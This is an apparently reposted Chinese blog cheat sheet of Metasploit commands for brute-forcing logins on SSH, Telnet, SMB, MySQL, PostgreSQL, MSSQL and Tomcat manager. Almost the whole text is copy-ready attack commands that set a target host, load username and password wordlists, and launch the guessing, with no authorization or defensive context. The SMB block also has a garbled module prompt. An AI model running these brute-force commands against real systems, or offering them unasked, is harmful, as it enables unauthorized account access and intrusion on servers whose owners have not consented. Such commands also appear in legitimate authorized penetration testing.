zoukankan      html  css  js  c++  java
  • msf爆破

    SSH服务口令猜解:

    msf > use auxiliary/scanner/ssh/ssh_login
    msf auxiliary(ssh_login) > show options
    msf auxiliary(ssh_login) > set RHOSTS 192.168.1.1
    msf auxiliary(ssh_login) > set USER_FILE /root/username.txt
    msf auxiliary(ssh_login) > set PASS_FILE /root/pass.txt
    msf auxiliary(ssh_login) > set THREADS 50
    msf auxiliary(ssh_login) > exploit

    Telnet口令猜解:
    msf > use auxiliary/scanner/telnet/telnet_login
    msf auxiliary(telnet_login) > show options
    msf auxiliary(telnet_login) > set RHOSTS 192.168.1.1
    msf auxiliary(telnet_login) > set USER_FILE /root/username.txt
    msf auxiliary(telnet_login) > set PASS_FILE /root/pass.txt
    msf auxiliary(telnet_login) > exploit

    Samba口令猜解:
    msf > use auxiliary/scanner/smb/smb_login
    msf auxiliary(smb_login) > show options
    msf auxiliary(smb_login) > set RHOSTS 192.168.1.1
    msf auxiliary(ssmb_login) > set USER_FILE /root/username.txt
    msf auxiliary(ssmb_login) > set PASS_FILE /root/pass.txt
    msf auxiliary(ssmb_login) > exploit

    Mysql口令猜解:
    msf > use auxiliary/scanner/mysql/mysql_login
    msf auxiliary(mysql_login) > show options
    msf auxiliary(mysql_login) > set RHOSTS 192.168.1.1
    msf auxiliary(mysql_login) > set USERNAME root
    msf auxiliary(mysql_login) > set PASS_FILE /root/pass.txt
    msf auxiliary(mysql_login) > exploit

    Postgresq口令猜解:
    msf > use auxiliary/scanner/postgres/postgres_login
    msf auxiliary(postgres_login) > show options
    msf auxiliary(postgres_login) > set RHOSTS 192.168.1.1
    msf auxiliary(postgres_login) > set USER_FILE /root/username.txt
    msf auxiliary(postgres_login) > set PASS_FILE /root/pass.txt
    msf auxiliary(postgres_login) > exploit

    Mssql口令猜解:
    msf > use auxiliary/scanner/mssql/mssql_login
    msf auxiliary(mssql_login) > show options
    msf auxiliary(mssql_login) > set RHOSTS 192.168.1.1
    msf auxiliary(mssql_login) > set USER_FILE /root/username.txt
    msf auxiliary(mssql_login) > set PASS_FILE /root/pass.txt
    msf auxiliary(mssql_login) > exploit

    Tomcat口令猜解:
    msf > use auxiliary/scanner/http/tomcat_mgr_login
    msf auxiliary(tomcat_mgr_login) > show options
    msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.1.1
    msf auxiliary(tomcat_mgr_login) > set USER_FILE username.txt
    msf auxiliary(tomcat_mgr_login) > set PASS_FILE /root/pass.txt
    msf auxiliary(tomcat_mgr_login) > exploit

    联系邮箱:yang_s1r@163.com 博客园地址:https://www.cnblogs.com/Yang34/
  • 相关阅读:
    Linux工具-curl
    常用工具-Postman
    HTTP头部信息
    HTTP状态码
    HTTP/HTTP2协议
    HTTP协议
    常用的服务端口
    三次握手,四次挥手和抓包工具
    路由表
    TCP/IP协议详解
  • 原文地址:https://www.cnblogs.com/Yang34/p/11407274.html
Copyright © 2011-2022 走看看